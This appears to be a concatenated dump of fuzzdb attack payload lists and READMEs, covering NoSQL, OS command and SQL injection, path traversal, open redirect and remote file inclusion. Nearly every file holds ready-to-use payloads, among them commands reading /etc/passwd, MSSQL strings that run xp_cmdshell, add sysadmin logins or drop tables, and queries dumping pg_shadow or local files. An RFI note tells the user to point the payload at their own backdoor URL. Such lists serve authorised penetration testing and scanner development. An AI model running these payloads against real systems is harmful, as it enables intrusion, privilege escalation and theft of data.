/fuzzdb/attack/no-sql-injection/mongodb.txt: -------------------------------------------------------------------------------- 1 | true, $where: '1 == 1' 2 | , $where: '1 == 1' 3 | $where: '1 == 1' 4 | ', $where: '1 == 1' 5 | 1, $where: '1 == 1' 6 | { $ne: 1 } 7 | ', $or: [ {}, { 'a':'a 8 | ' } ], $comment:'successful MongoDB injection' 9 | db.injection.insert({success:1}); 10 | db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 11 | || 1==1 12 | ' && this.password.match(/.*/)//+%00 13 | ' && this.passwordzz.match(/.*/)//+%00 14 | '%20%26%26%20this.password.match(/.*/)//+%00 15 | '%20%26%26%20this.passwordzz.match(/.*/)//+%00 16 | {$gt: ''} 17 | [$ne]=1 18 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/Commands-OSX.txt: -------------------------------------------------------------------------------- 1 | alias 2 | alloc 3 | apropos 4 | awk 5 | basename 6 | bash 7 | bg 8 | bind 9 | bless 10 | break 11 | builtin 12 | bzip 13 | cal 14 | caller 15 | case 16 | cat 17 | cd 18 | chflags 19 | chgrp 20 | chmod 21 | chown 22 | chroot 23 | cksum 24 | clear 25 | cmp 26 | comm 27 | command 28 | complete 29 | continue 30 | cp 31 | cron 32 | crontab 33 | curl 34 | cut 35 | date 36 | dc 37 | dd 38 | declare 39 | defaults 40 | df 41 | diff 42 | diff3 43 | dig 44 | dirname 45 | dirs 46 | diskutil 47 | disown 48 | ditto 49 | dot_clean 50 | drutil 51 | dscacheutil 52 | dscl 53 | du 54 | echo 55 | ed 56 | enable 57 | env 58 | eval 59 | exec 60 | exit 61 | expand 62 | expect 63 | export 64 | expr 65 | false 66 | fc 67 | fdisk 68 | fg 69 | file 70 | find 71 | fmt 72 | fold 73 | for 74 | fsck 75 | fsaclctl 76 | fs_usage 77 | ftp 78 | GetFileInfo 79 | getopt 80 | getopts 81 | goto 82 | grep 83 | groups 84 | gzip 85 | hash 86 | head 87 | hdiutil 88 | history 89 | hostname 90 | id 91 | if 92 | info 93 | install 94 | jobs 95 | join 96 | kextfind 97 | kickstart 98 | kill 99 | l 100 | last 101 | launchctl 102 | ll 103 | less 104 | let 105 | lipo 106 | ln 107 | local 108 | locate 109 | logname 110 | login 111 | logout 112 | lpr 113 | lprm 114 | lpstat 115 | ls 116 | lsregister 117 | lsbom 118 | lsof 119 | man 120 | mdfind 121 | mdutil 122 | mkdir 123 | mkfifo 124 | more 125 | mount 126 | mv 127 | net 128 | netstat 129 | networksetup 130 | nice 131 | nohup 132 | ntfs.util 133 | onintr 134 | open 135 | opensnoop 136 | osacompile 137 | osascript 138 | passwd 139 | paste 140 | pbcopy 141 | pbpaste 142 | pico 143 | ping 144 | pkgutil 145 | plutil 146 | pmset 147 | popd 148 | pr 149 | printenv 150 | printf 151 | ps 152 | pushd 153 | pwd 154 | quota 155 | rcp 156 | read 157 | readonly 158 | reboot 159 | return 160 | rev 161 | rm 162 | rmdir 163 | rpm 164 | rsync 165 | say 166 | screen 167 | screencapture 168 | sdiff 169 | security 170 | sed 171 | select 172 | set 173 | setfile 174 | shift 175 | shopt 176 | shutdown 177 | sips 178 | sleep 179 | softwareupdate 180 | sort 181 | source 182 | split 183 | stop 184 | su 185 | sudo 186 | sum 187 | suspend 188 | sw_vers 189 | system_profiler 190 | systemsetup 191 | tail 192 | tar 193 | tee 194 | test 195 | textutil 196 | time 197 | times 198 | top 199 | touch 200 | tr 201 | trap 202 | traceroute 203 | true 204 | tty 205 | type 206 | ufs.util 207 | ulimit 208 | umask 209 | umount 210 | unalias 211 | uname 212 | unexpand 213 | uniq 214 | units 215 | unset 216 | until 217 | users 218 | uuencode 219 | uudecode 220 | uuidgen 221 | uucp 222 | vi 223 | wait 224 | wc 225 | whatis 226 | where 227 | which 228 | while 229 | who 230 | whoami 231 | write 232 | xargs 233 | yes 234 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/Commands-Windows.txt: -------------------------------------------------------------------------------- 1 | a 2 | arp 3 | assoc 4 | at 5 | atmadm 6 | attrib 7 | bootcfg 8 | break 9 | cacls 10 | call 11 | change 12 | chcp 13 | chdir 14 | chkdsk 15 | chkntfs 16 | cipher 17 | cls 18 | cmd 19 | cmstp 20 | color 21 | comp 22 | compact 23 | convert 24 | copy 25 | cprofile 26 | cscript 27 | date 28 | defrag 29 | del 30 | dir 31 | diskcomp 32 | diskcopy 33 | diskpart 34 | doskey 35 | driverquery 36 | echo 37 | endlocal 38 | eventcreate 39 | eventquery 40 | eventtriggers 41 | evntcmd 42 | exit 43 | expand 44 | fc 45 | filter 46 | find 47 | findstr 48 | finger 49 | flattemp 50 | for 51 | format 52 | fsutil 53 | ftp 54 | ftype 55 | getmac 56 | goto 57 | gpresult 58 | gpupdate 59 | graftabl 60 | help 61 | helpctr 62 | hostname 63 | if 64 | ipconfig 65 | ipseccmd 66 | ipxroute 67 | irftp 68 | label 69 | lodctr 70 | logman 71 | lpq 72 | lpr 73 | macfile 74 | mkdir 75 | mmc 76 | mode 77 | more 78 | mountvol 79 | move 80 | msiexec 81 | msinfo32 82 | nbtstat 83 | net 84 | netsh 85 | netstat 86 | nslookup 87 | ntbackup 88 | ntcmdprompt 89 | ntsd 90 | openfiles 91 | pagefileconfig 92 | path 93 | pathping 94 | pause 95 | pbadmin 96 | pentnt 97 | perfmon 98 | ping 99 | popd 100 | print 101 | prncnfg 102 | prndrvr 103 | prnjobs 104 | prnmngr 105 | prnport 106 | prnqctl 107 | prompt 108 | pushd 109 | query 110 | rasdial 111 | rcp 112 | recover 113 | reg 114 | regsvr32 115 | relog 116 | rem 117 | rename 118 | replace 119 | rexec 120 | rmdir 121 | route 122 | rsh 123 | rsm 124 | runas 125 | sc 126 | schtasks 127 | secedit 128 | set 129 | setlocal 130 | shift 131 | shutdown 132 | sort 133 | start 134 | subst 135 | systeminfo 136 | sfc 137 | taskkill 138 | tasklist 139 | tcmsetup 140 | telnet 141 | tftp 142 | time 143 | title 144 | tracerpt 145 | tracert 146 | tree 147 | type 148 | typeperf 149 | unlodctr 150 | ver 151 | verify 152 | vol 153 | vssadmin 154 | w32tm 155 | winnt 156 | winnt32 157 | wmic 158 | xcopy 159 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/OSCommandInject.Windows.txt: -------------------------------------------------------------------------------- 1 | +|+Dir+c:\ 2 | $+|+Dir+c:\ 3 | %26%26+|+dir c:\ 4 | $%26%26dir c:\ 5 | %0a+dir+c:\ 6 | +|+Dir+c:%255c 7 | $+|+Dir+c:%255c 8 | %26%26+|+dir c:%255c 9 | $%26%26dir+c:%255c 10 | %0a+dir+c:%255c 11 | +|+Dir+c:%2f 12 | $+|+Dir+c:%2f 13 | %26%26+|+dir c:%2f 14 | $%26%26dir+c:%2f 15 | %0a+dir+c:%2f 16 | +dir+c:\+| 17 | +|+dir+c:\+| 18 | +|+dir+c:%2f+| 19 | dir+c:\ 20 | ||+dir|c:\ 21 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/command-execution-unix.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | /index.html|id| 4 | ;id; 5 | ;id 6 | ;netstat -a; 7 | ;id; 8 | |id 9 | |/usr/bin/id 10 | |id| 11 | |/usr/bin/id| 12 | ||/usr/bin/id| 13 | |id; 14 | ||/usr/bin/id; 15 | ;id| 16 | ;|/usr/bin/id| 17 | \n/bin/ls -al\n 18 | \n/usr/bin/id\n 19 | \nid\n 20 | \n/usr/bin/id; 21 | \nid; 22 | \n/usr/bin/id| 23 | \nid| 24 | ;/usr/bin/id\n 25 | ;id\n 26 | |usr/bin/id\n 27 | |nid\n 28 | `id` 29 | `/usr/bin/id` 30 | a);id 31 | a;id 32 | a);id; 33 | a;id; 34 | a);id| 35 | a;id| 36 | a)|id 37 | a|id 38 | a)|id; 39 | a|id 40 | |/bin/ls -al 41 | a);/usr/bin/id 42 | a;/usr/bin/id 43 | a);/usr/bin/id; 44 | a;/usr/bin/id; 45 | a);/usr/bin/id| 46 | a;/usr/bin/id| 47 | a)|/usr/bin/id 48 | a|/usr/bin/id 49 | a)|/usr/bin/id; 50 | a|/usr/bin/id 51 | ;system('cat%20/etc/passwd') 52 | ;system('id') 53 | ;system('/usr/bin/id') 54 | %0Acat%20/etc/passwd 55 | %0A/usr/bin/id 56 | %0Aid 57 | %0A/usr/bin/id%0A 58 | %0Aid%0A 59 | & ping -i 30 127.0.0.1 & 60 | & ping -n 30 127.0.0.1 & 61 | %0a ping -i 30 127.0.0.1 %0a 62 | `ping 127.0.0.1` 63 | | id 64 | & id 65 | ; id 66 | %0a id %0a 67 | `id` 68 | $;/usr/bin/id 69 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/command-injection-template.txt: -------------------------------------------------------------------------------- 1 | {cmd} 2 | ;{cmd} 3 | ;{cmd}; 4 | ^{cmd} 5 | |{cmd} 6 | <{cmd} 7 | <{cmd}; 8 | <{cmd}\n 9 | <{cmd}%0D 10 | <{cmd}%0A 11 | &{cmd} 12 | &{cmd}& 13 | &&{cmd} 14 | &&{cmd}&& 15 | %0D{cmd} 16 | %0D{cmd}%0D 17 | %0A{cmd} 18 | %0A{cmd}%0A 19 | \n{cmd} 20 | \n{cmd}\n 21 | '{cmd}' 22 | `{cmd}` 23 | ;{cmd}| 24 | ;{cmd}/n 25 | |{cmd}; 26 | a);{cmd} 27 | a;{cmd} 28 | a);{cmd} 29 | a;{cmd}; 30 | a);{cmd}| 31 | FAIL||{cmd} 32 | CMD=$'{cmd}';$CMD 33 | ;CMD=$'{cmd}';$CMD 34 | ^CMD=$'{cmd}';$CMD 35 | |CMD=$'{cmd}';$CMD 36 | &CMD=$'{cmd}';$CMD 37 | &&CMD=$'{cmd}';$CMD 38 | %0DCMD=$'{cmd}';$CMD 39 | FAIL||CMD=$'{cmd}';$CMD 40 | CMD=$\'{cmd}\';$CMD 41 | ;CMD=$\'{cmd}\';$CMD 42 | ^CMD=$\'{cmd}\';$CMD 43 | |CMD=$\'{cmd}\';$CMD 44 | &CMD=$\'{cmd}\';$CMD 45 | &&CMD=$\'{cmd}\';$CMD 46 | %0DCMD=$\'{cmd}\';$CMD 47 | FAIL||CMD=$\'{cmd}\';$CMD 48 | CMD=$"{cmd}";$CMD 49 | ;CMD=$"{cmd}";$CMD 50 | ^CMD=$"{cmd}";$CMD 51 | |CMD=$"{cmd}";$CMD 52 | &CMD=$"{cmd}";$CMD 53 | &&CMD=$"{cmd}";$CMD 54 | %0DCMD=$"{cmd}";$CMD 55 | FAIL||CMD=$"{cmd}";$CMD 56 | 57 | ;system('{cmd}') 58 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/shell-delimiters.txt: -------------------------------------------------------------------------------- 1 | ; 2 | ^ 3 | & 4 | && 5 | | 6 | || 7 | %0D 8 | %0A 9 | \n 10 | < 11 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/shell-operators.txt: -------------------------------------------------------------------------------- 1 | < 2 | > 3 | << 4 | >> 5 | <> 6 | >| 7 | | 8 | || 9 | & 10 | && 11 | $ 12 | ; 13 | &> 14 | &>> 15 | <<< 16 | >>> 17 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/source-disc-cmd-exec-traversal.txt: -------------------------------------------------------------------------------- 1 | ..%255c 2 | .%5c../..%5c 3 | /..%c0%9v../ 4 | /..%c0%af../ 5 | /..%255c..%255c 6 | 7 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/useful-commands-unix.txt: -------------------------------------------------------------------------------- 1 | uname -n -s 2 | whoami 3 | pwd 4 | last 5 | cat /etc/passwd 6 | ls -la /tmp 7 | ls -la /home 8 | ping -i 30 127.0.0.1 9 | ping 127.0.0.1 10 | ping -n 30 11 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-cmd-execution/useful-commands-windows.txt: -------------------------------------------------------------------------------- 1 | ver 2 | chdir 3 | echo %USERNAME% 4 | -------------------------------------------------------------------------------- /fuzzdb/attack/os-dir-indexing/directory-indexing.txt: -------------------------------------------------------------------------------- 1 | ;dir 2 | `dir` 3 | |dir| 4 | |dir 5 | /%3f.jsp 6 | ?M=D 7 | //////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// 8 | -------------------------------------------------------------------------------- /fuzzdb/attack/path-traversal/README.md: -------------------------------------------------------------------------------- 1 | 2 | **traversals-8-deep-exotic-encoding.fuzz.txt** 3 | 4 | Use Regex to replace {FILE} with your target filename 5 | 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/path-traversal/path-traversal-windows.txt: -------------------------------------------------------------------------------- 1 | C:/inetpub/wwwroot/global.asa 2 | C:\inetpub\wwwroot\global.asa 3 | C:/boot.ini 4 | C:\boot.ini 5 | D:\inetpub\wwwroot\global.asa 6 | D:/inetpub/wwwroot/global.asa 7 | -------------------------------------------------------------------------------- /fuzzdb/attack/redirect/README.md: -------------------------------------------------------------------------------- 1 | * redirect-injection-template.txt 2 | * Patterns for injecting into a value for attempting to bypass many input validation filters that intended to only allow only relative links on the same origin.
3 | * redirect-urls-template.txt 4 | * URL patterns that commonly lead to open redirect.
5 | 6 | Usage:
7 | Replace {target} in files with ip or hostname and path, Examples:
8 | * evil.com
9 | * evil.com/badurl
10 | * 1.2.3.4
11 | * 134744072
12 | 13 | Testing techniques:
14 | Filter Bypass 15 | * If periods are being stripped by the filter so that evil.com becomes evilcom, try converting the ip address to decimal notation form. 16 | http://www.geektools.com/geektools-cgi/ipconv.cgi 17 | * Try URL-encoding the replacement value for {target} 18 | Other Issues 19 | * If redirect.injection.template.txt usage results in the server proxying a request to the injected URL and returning its contents instead of redirecting to it, explore how this could be used to explore the servers localhost ports for web services, protected systems in a DMZ, interact through GET requests/REST interfaces, etc. 20 | 21 | TODO 22 | -------------------------------------------------------------------------------- /fuzzdb/attack/redirect/redirect-injection-template.txt: -------------------------------------------------------------------------------- 1 | {target} 2 | /{target} 3 | //{target} 4 | ///{target} 5 | ////{target} 6 | /\{target} 7 | %2f{target} 8 | %2f$2f{target} 9 | %2f{target}%2f%2f 10 | $2f%2f{target}%2f%2f 11 | %2f{target}// 12 | -------------------------------------------------------------------------------- /fuzzdb/attack/redirect/redirect-urls-template.txt: -------------------------------------------------------------------------------- 1 | ?url=http://{target} 2 | ?url=https://{target} 3 | ?next=http://{target} 4 | ?next=https://{target} 5 | ?url=http://{target} 6 | ?url=https://{target} 7 | ?url=http://{target} 8 | ?url=//{target} 9 | ?url=$2f%2f{target} 10 | ?next=//{target} 11 | ?next=$2f%2f{target} 12 | ?url=//{target} 13 | ?url=$2f%2f{target} 14 | ?url=//{target} 15 | /redirect/{target} 16 | /cgi-bin/redirect.cgi?{target} 17 | /out/{target} 18 | /out?{target} 19 | /out?/{target} 20 | /out?//{target} 21 | /out?/\{target} 22 | /out?///{target} 23 | ?view={target} 24 | ?view=/{target} 25 | ?view=//{target} 26 | ?view=/\{target} 27 | ?view=///{target} 28 | /login?to={target} 29 | /login?to=/{target} 30 | /login?to=//{target} 31 | /login?to=/\{target} 32 | /login?to=///{target} 33 | -------------------------------------------------------------------------------- /fuzzdb/attack/rfi/README.md: -------------------------------------------------------------------------------- 1 | rfi.fuzz.txt 2 | 3 | Remote File Include scanning 4 | 5 | Compiled by RSnake 02/01/2010 6 | 7 | Mostly from milw0rm osvdb.org and elsewhere 8 | 9 | Change XXpathXX to the path of your backdoor. 10 | Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own XXpathXX URL: 11 | 12 | XXpathXX => http://www.example.com/hax.txt? 13 | 14 | see fuzzdb docs: 15 | 16 | /docs/attack-docs/rfi-cheatsheet.html 17 | 18 | Other tools: 19 | 20 | fimap http://code.google.com/p/fimap/ 21 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/GenericBlind.txt: -------------------------------------------------------------------------------- 1 | sleep(__TIME__)# 2 | 1 or sleep(__TIME__)# 3 | " or sleep(__TIME__)# 4 | ' or sleep(__TIME__)# 5 | " or sleep(__TIME__)=" 6 | ' or sleep(__TIME__)=' 7 | 1) or sleep(__TIME__)# 8 | ") or sleep(__TIME__)=" 9 | ') or sleep(__TIME__)=' 10 | 1)) or sleep(__TIME__)# 11 | ")) or sleep(__TIME__)=" 12 | ')) or sleep(__TIME__)=' 13 | ;waitfor delay '0:0:__TIME__'-- 14 | );waitfor delay '0:0:__TIME__'-- 15 | ';waitfor delay '0:0:__TIME__'-- 16 | ";waitfor delay '0:0:__TIME__'-- 17 | ');waitfor delay '0:0:__TIME__'-- 18 | ");waitfor delay '0:0:__TIME__'-- 19 | ));waitfor delay '0:0:__TIME__'-- 20 | '));waitfor delay '0:0:__TIME__'-- 21 | "));waitfor delay '0:0:__TIME__'-- 22 | benchmark(10000000,MD5(1))# 23 | 1 or benchmark(10000000,MD5(1))# 24 | " or benchmark(10000000,MD5(1))# 25 | ' or benchmark(10000000,MD5(1))# 26 | 1) or benchmark(10000000,MD5(1))# 27 | ") or benchmark(10000000,MD5(1))# 28 | ') or benchmark(10000000,MD5(1))# 29 | 1)) or benchmark(10000000,MD5(1))# 30 | ")) or benchmark(10000000,MD5(1))# 31 | ')) or benchmark(10000000,MD5(1))# 32 | pg_sleep(__TIME__)-- 33 | 1 or pg_sleep(__TIME__)-- 34 | " or pg_sleep(__TIME__)-- 35 | ' or pg_sleep(__TIME__)-- 36 | 1) or pg_sleep(__TIME__)-- 37 | ") or pg_sleep(__TIME__)-- 38 | ') or pg_sleep(__TIME__)-- 39 | 1)) or pg_sleep(__TIME__)-- 40 | ")) or pg_sleep(__TIME__)-- 41 | ')) or pg_sleep(__TIME__)-- 42 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/Generic_SQLI.txt: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/MSSQL.txt: -------------------------------------------------------------------------------- 1 | '; exec master..xp_cmdshell 'ping 10.10.1.2'-- 2 | 'create user name identified by 'pass123' -- 3 | 'create user name identified by pass123 temporary tablespace temp default tablespace users; 4 | ' ; drop table temp -- 5 | 'exec sp_addlogin 'name' , 'password' -- 6 | ' exec sp_addsrvrolemember 'name' , 'sysadmin' -- 7 | ' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) -- 8 | ' grant connect to name; grant resource to name; -- 9 | ' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64) 10 | ' or 1=1 -- 11 | ' union (select @@version) -- 12 | ' union (select NULL, (select @@version)) -- 13 | ' union (select NULL, NULL, (select @@version)) -- 14 | ' union (select NULL, NULL, NULL, (select @@version)) -- 15 | ' union (select NULL, NULL, NULL, NULL, (select @@version)) -- 16 | ' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) -- 17 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/MSSQL_blind.txt: -------------------------------------------------------------------------------- 1 | '; if not(substring((select @@version),25,1) <> 0) waitfor delay '0:0:2' -- 2 | '; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' -- 3 | '; if not(substring((select @@version),25,1) <> 8) waitfor delay '0:0:2' -- 4 | '; if not(substring((select @@version),24,1) <> 1) waitfor delay '0:0:2' -- 5 | '; if not(select system_user) <> 'sa' waitfor delay '0:0:2' -- 6 | '; if is_srvrolemember('sysadmin') > 0 waitfor delay '0:0:2' -- 7 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 1) waitfor delay '0:0:2' -- 8 | '; if not((select serverproperty('isintegratedsecurityonly')) <> 0) waitfor delay '0:0:2' -- 9 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/MySQL.txt: -------------------------------------------------------------------------------- 1 | 1'1 2 | 1 exec sp_ (or exec xp_) 3 | 1 and 1=1 4 | 1' and 1=(select count(*) from tablenames); -- 5 | 1 or 1=1 6 | 1' or '1'='1 7 | 1or1=1 8 | 1'or'1'='1 9 | fake@ema'or'il.nl'='il.nl 10 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/MySQL_MSSQL.txt: -------------------------------------------------------------------------------- 1 | 1 2 | 1 and user_name() = 'dbo' 3 | \'; desc users; -- 4 | 1\'1 5 | 1' and non_existant_table = '1 6 | ' or username is not NULL or username = ' 7 | 1 and ascii(lower(substring((select top 1 name from sysobjects where xtype='u'), 1, 1))) > 116 8 | 1 union all select 1,2,3,4,5,6,name from sysobjects where xtype = 'u' -- 9 | 1 uni/**/on select all from where 10 | 11 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/detect/README.md: -------------------------------------------------------------------------------- 1 | 2 | **MSSQL.fuzz.txt** 3 | 4 | you will need to customize/modify some of the values in the payload queries for best effect 5 | 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/exploit/README.md: -------------------------------------------------------------------------------- 1 | 2 | various useful post-exploitation commands 3 | 4 | **ms-sql-enumeration.fuzz.txt** 5 | * ms-sqli info disclosure payload fuzzfile 6 | * replace regex with your fuzzer for best results 7 | * run wireshark or tcpdump, look for incoming smb or icmp packets from victim 8 | * might need to terminate payloads with ;-- 9 | 10 | 11 | **mysql-injection-login-bypass.fuzz.txt** 12 | * regex replace as many as you can with your fuzzer for best results: 13 | * 14 | * also try to brute force a list of possible usernames, including possile admin acct names 15 | 16 | **mysql-read-local-files.fuzz.txt** 17 | * mysql local file disclosure through sqli 18 | * fuzz interesting absolute filepath/filename into 19 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/exploit/db2-enumeration.txt: -------------------------------------------------------------------------------- 1 | select versionnumber, version_timestamp from sysibm.sysversions; 2 | select user from sysibm.sysdummy1; 3 | select session_user from sysibm.sysdummy1; 4 | select system_user from sysibm.sysdummy1; 5 | select current server from sysibm.sysdummy1; 6 | select name from sysibm.systables; 7 | select grantee from syscat.dbauth; 8 | select * from syscat.tabauth; 9 | select * from syscat.dbauth where grantee = current user; 10 | select * from syscat.tabauth where grantee = current user; 11 | select name, tbname, coltype from sysibm.syscolumns; 12 | SELECT schemaname FROM syscat.schemata; 13 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/exploit/ms-sql-enumeration.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ihebski/angryFuzzer/d6673c3b8cb9e6a5455de3715cf3ff57fce88163/fuzzdb/attack/sql-injection/exploit/ms-sql-enumeration.txt -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/exploit/mysql-injection-login-bypass.txt: -------------------------------------------------------------------------------- 1 | ' OR 1=1-- 2 | 'OR '' = ' Allows authentication without a valid username. 3 | '-- 4 | ' union select 1, '', '' 1-- 5 | 'OR 1=1-- 6 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/exploit/mysql-read-local-files.txt: -------------------------------------------------------------------------------- 1 | create table myfile (input TEXT); load data infile '' into table myfile; select * from myfile; 2 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/exploit/postgres-enumeration.txt: -------------------------------------------------------------------------------- 1 | select version(); 2 | select current_database(); 3 | select current_user; 4 | select session_user; 5 | select current_setting('log_connections'); 6 | select current_setting('log_statement'); 7 | select current_setting('port'); 8 | select current_setting('password_encryption'); 9 | select current_setting('krb_server_keyfile'); 10 | select current_setting('virtual_host'); 11 | select current_setting('port'); 12 | select current_setting('config_file'); 13 | select current_setting('hba_file'); 14 | select current_setting('data_directory'); 15 | select * from pg_shadow; 16 | select * from pg_group; 17 | create table myfile (input TEXT); 18 | copy myfile from '/etc/passwd'; 19 | select * from myfile;copy myfile to /tmp/test; 20 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/payloads-sql-blind/README.md: -------------------------------------------------------------------------------- 1 | credits: http://funoverip.net/2010/12/blind-sql-injection-detection-with-burp-suite/ 2 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MSSQL-WHERE.txt: -------------------------------------------------------------------------------- 1 | waitfor delay '0:0:20' /* 2 | waitfor delay '0:0:20' -- 3 | ' waitfor delay '0:0:20' /* 4 | ' waitfor delay '0:0:20' -- 5 | " waitfor delay '0:0:20' /* 6 | " waitfor delay '0:0:20' -- 7 | ) waitfor delay '0:0:20' /* 8 | ) waitfor delay '0:0:20' -- 9 | )) waitfor delay '0:0:20' /* 10 | )) waitfor delay '0:0:20' -- 11 | ))) waitfor delay '0:0:20' /* 12 | ))) waitfor delay '0:0:20' -- 13 | )))) waitfor delay '0:0:20' /* 14 | )))) waitfor delay '0:0:20' -- 15 | ))))) waitfor delay '0:0:20' -- 16 | )))))) waitfor delay '0:0:20' -- 17 | ') waitfor delay '0:0:20' /* 18 | ') waitfor delay '0:0:20' -- 19 | ") waitfor delay '0:0:20' /* 20 | ") waitfor delay '0:0:20' -- 21 | ')) waitfor delay '0:0:20' /* 22 | ')) waitfor delay '0:0:20' -- 23 | ")) waitfor delay '0:0:20' /* 24 | ")) waitfor delay '0:0:20' -- 25 | '))) waitfor delay '0:0:20' /* 26 | '))) waitfor delay '0:0:20' -- 27 | "))) waitfor delay '0:0:20' /* 28 | "))) waitfor delay '0:0:20' -- 29 | ')))) waitfor delay '0:0:20' /* 30 | ')))) waitfor delay '0:0:20' -- 31 | ")))) waitfor delay '0:0:20' /* 32 | ")))) waitfor delay '0:0:20' -- 33 | '))))) waitfor delay '0:0:20' /* 34 | '))))) waitfor delay '0:0:20' -- 35 | "))))) waitfor delay '0:0:20' /* 36 | "))))) waitfor delay '0:0:20' -- 37 | ')))))) waitfor delay '0:0:20' /* 38 | ')))))) waitfor delay '0:0:20' -- 39 | ")))))) waitfor delay '0:0:20' /* 40 | ")))))) waitfor delay '0:0:20' -- -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-ORDER_BY.txt: -------------------------------------------------------------------------------- 1 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 2 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 3 | ,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 4 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 5 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 6 | ',(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 7 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 8 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 9 | ",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 10 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 11 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 12 | ),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 13 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 14 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 15 | '),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 16 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/* 17 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))-- 18 | "),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))%23 19 | -------------------------------------------------------------------------------- /fuzzdb/attack/sql-injection/payloads-sql-blind/payloads-sql-blind-MySQL-WHERE.txt: -------------------------------------------------------------------------------- 1 | and 0=benchmark(3000000,MD5(1))%20/* 2 | and 0=benchmark(3000000,MD5(1))%20-- 3 | and 0=benchmark(3000000,MD5(1))%20%23 4 | ' and 0=benchmark(3000000,MD5(1))%20/* 5 | ' and 0=benchmark(3000000,MD5(1))%20-- 6 | ' and 0=benchmark(3000000,MD5(1))%20%23 7 | " and 0=benchmark(3000000,MD5(1))%20/* 8 | " and 0=benchmark(3000000,MD5(1))%20-- 9 | " and 0=benchmark(3000000,MD5(1))%20%23 10 | ) and 0=benchmark(3000000,MD5(1))%20/* 11 | ) and 0=benchmark(3000000,MD5(1))%20-- 12 | ) and 0=benchmark(3000000,MD5(1))%20%23 13 | )) and 0=benchmark(3000000,MD5(1))%20/* 14 | )) and 0=benchmark(3000000,MD5(1))%20-- 15 | )) and 0=benchmark(3000000,MD5(1))%20%23 16 | ))) and 0=benchmark(3000000,MD5(1))%20/* 17 | ))) and 0=benchmark(3000000,MD5(1))%20-- 18 | ))) and 0=benchmark(3000000,MD5(1))%20%23 19 | )))) and 0=benchmark(3000000,MD5(1))%20/* 20 | )))) and 0=benchmark(3000000,MD5(1))%20-- 21 | )))) and 0=benchmark(3000000,MD5(1))%20%23 22 | ') and 0=benchmark(3000000,MD5(1))%20/* 23 | ') and 0=benchmark(3000000,MD5(1))%20-- 24 | ') and 0=benchmark(3000000,MD5(1))%20%23 25 | ") and 0=benchmark(3000000,MD5(1))%20/* 26 | ") and 0=benchmark(3000000,MD5(1))%20-- 27 